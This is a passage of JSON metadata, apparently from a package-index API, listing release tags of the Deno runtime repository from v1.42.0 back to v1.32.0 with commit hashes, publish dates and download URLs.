v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/re